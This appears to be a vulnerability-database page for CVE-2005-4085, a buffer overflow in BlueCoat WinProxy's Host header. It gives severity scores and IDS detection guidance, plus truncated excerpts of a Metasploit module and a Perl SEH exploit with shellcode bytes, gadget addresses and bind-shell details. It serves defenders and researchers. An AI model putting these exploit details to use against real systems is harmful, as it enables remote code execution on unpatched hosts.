CVE-2005-4085
published 2005-12-31CVE-2005-4085: Buffer overflow in BlueCoat (a) WinProxy before 6.1a and (b) the web console access functionality in ProxyAV before 2.4.2.3 allows remote attackers to execute…
PriorityP356high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
65.92%
99.2th percentile
Buffer overflow in BlueCoat (a) WinProxy before 6.1a and (b) the web console access functionality in ProxyAV before 2.4.2.3 allows remote attackers to execute arbitrary code via a long Host: header.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bluecoat | webproxy | — | — |
| bluecoat | webproxy | — | — |
| bluecoat | webproxy | — | — |
| bluecoat | webproxy | — | — |
| bluecoat | webproxy | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26\x8c\x6d\xa3
- →Detect exploit attempts by inspecting HTTP Host headers containing an oversized port value (after the colon) directed at WinProxy on TCP/80; the overflow is triggered in the port field of the Host header. ↗
- →Flag HTTP requests where the Host header port field contains NOP sleds (0x90 sequences) followed by a short JMP (0xeb) and a 4-byte SEH overwrite value, characteristic of SEH-based exploitation of this vulnerability. ↗
- →After successful exploitation, a bind shell is opened on TCP/4444 on the victim host; monitor for unexpected listening services on port 4444 on WinProxy/ProxyAV systems. ↗
- →The exploit payload uses bad characters \x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c; IDS signatures for shellcode in the Host header port field should account for these exclusions when building byte-pattern rules. ↗
- →The SEH overwrite targets a POP/POP/RET gadget at 0x01031240 in PAVDLL on WinProxy 6.0 R1c; presence of this return address in network traffic is a strong indicator of exploitation. ↗
- ·The Metasploit module targets a specific return address (0x6020ba04) in Asmdat.dll; this gadget address is version-specific and will not apply to all WinProxy builds. ↗
- ·The standalone Perl exploit hardcodes the SEH overwrite to PAVDLL offset 0x01031240 (POP/POP/RET), which is specific to WinProxy 6.0 R1c and may differ across patch levels. ↗
- ·The payload space is limited to 600 bytes and requires a stack adjustment of -3500 bytes; custom shellcode must fit within these constraints and avoid the listed bad characters. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Blue Coat WinProxy - Host Header Overflow (Metasploit)
exploitdb·2010-07-12
CVE-2005-4085 Blue Coat WinProxy - Host Header Overflow (Metasploit)
Blue Coat WinProxy - Host Header Overflow (Metasploit)
---
##
# $Id: bluecoat_winproxy_host.rb 9797 2010-07-12 23:25:31Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'HEAD', :pattern => [ /BlueCoat/ ] }
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Blue Coat WinProxy Host Header Overflow',
'Description' => %q{
This module exploits a buffer overflow in the Blue Coat Systems WinProxy
service by sending a long port value for the Host header in a HTTP
Exploit-DB
BlueCoat WinProxy 6.0 R1c - 'Host' Remote Stack Overflow (SEH)
exploitdb·2006-01-07
CVE-2005-4085 BlueCoat WinProxy 6.0 R1c - 'Host' Remote Stack Overflow (SEH)
BlueCoat WinProxy 6.0 R1c - 'Host' Remote Stack Overflow (SEH)
---
#!perl
#
# "WinProxy 6.0 R1c" Remote Stack/SEH Overflow Exploit
#
# Author: FistFucker (aka FistFuXXer)
# e-Mail: [email protected]
#
#
# Advisory:
# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364
#
# CVE info:
# CAN-2005-4085
#
use IO::Socket;
#
# destination IP address
#
$ip = '127.0.0.1';
#
# destination TCP port
#
$port = 80;
#
# SE handler. 0x00, 0x0a, 0x0d free
#
$seh = reverse( "\x01\x03\x12\x40" ); # POP/POP/RET
# PAVDLL.01031240
#
# JMP SHORT to shellcode. 0x00, 0x0a, 0x0d free
#
$jmp = "\x90\x90\xeb\x32"; # [NOP][NOP][JMP|JMP]
#
# 0x00, 0x0a, 0x0d free shellcode
#
# win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
#
$sc = "\x31\xc9\x83\x
Metasploit
Blue Coat WinProxy Host Header Overflow
metasploit
Blue Coat WinProxy Host Header Overflow
Blue Coat WinProxy Host Header Overflow
This module exploits a buffer overflow in the Blue Coat Systems WinProxy service by sending a long port value for the Host header in a HTTP request.
No writeups or analysis indexed.
http://secunia.com/advisories/18288http://secunia.com/advisories/18909http://securitytracker.com/id?1015441http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.htmlhttp://www.idefense.com/intelligence/vulnerabilities/display.php?id=364http://www.securityfocus.com/bid/16147http://www.vupen.com/english/advisories/2006/0065http://www.vupen.com/english/advisories/2006/0622http://secunia.com/advisories/18288http://secunia.com/advisories/18909http://securitytracker.com/id?1015441http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.htmlhttp://www.idefense.com/intelligence/vulnerabilities/display.php?id=364http://www.securityfocus.com/bid/16147http://www.vupen.com/english/advisories/2006/0065http://www.vupen.com/english/advisories/2006/0622
2005-12-31
Published